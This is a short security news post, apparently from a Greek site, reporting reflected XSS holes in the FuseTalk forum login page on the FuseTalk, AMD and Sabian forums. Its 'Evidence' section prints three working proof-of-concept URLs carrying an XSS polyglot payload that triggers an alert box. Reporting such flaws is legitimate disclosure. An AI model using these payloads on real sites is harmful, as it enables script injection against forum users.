Home security XSS vulnerability on FuseTalk and the AMD forum

XSS vulnerability on FuseTalk and the AMD forum

By Hack Unamatata

6 January 2012, 18: 33

The hacker with the nickname "Sony" discovered XSS vulnerability in the forumsFuseTalk, AMD and Sabian. It is not a critical vulnerability but can be used by malicious users for spamming. A little earlier he had discovered and reported several vulnerabilities <…>

on well-known websites including Adobe and Oxford University.

Evidence:

fusetalk.com:

http://forums.fusetalk.com/login.cfm?windowed=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

forums.amd.com:

http://forums.amd.com/game/login.cfm?windowed=yes%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

community.sabian.com:

http://community.sabian.com/fusetalk/forum/login.cfm?windowed=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

Previous articleBeta version of the Mantra Armada 0.81 security tool was released

Next articlePersistent XSS vulnerability was found on VirusChief.com

LEAVE ANSWER Ακύρωση απάντησης

Hack Unamatata https://www.secnews.gr

H @ ck my life!

LIVE NEWS

Chinese (Simplified)